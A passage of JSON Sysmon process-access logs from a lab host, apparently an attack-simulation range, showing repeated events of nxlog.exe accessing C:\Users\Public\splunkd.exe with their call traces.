(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:34.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:34.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:35.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:35.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:36.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:36.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:37.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:37.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:38.529\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:38.529","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:39.530\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:39.530","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6165,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:40.530\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 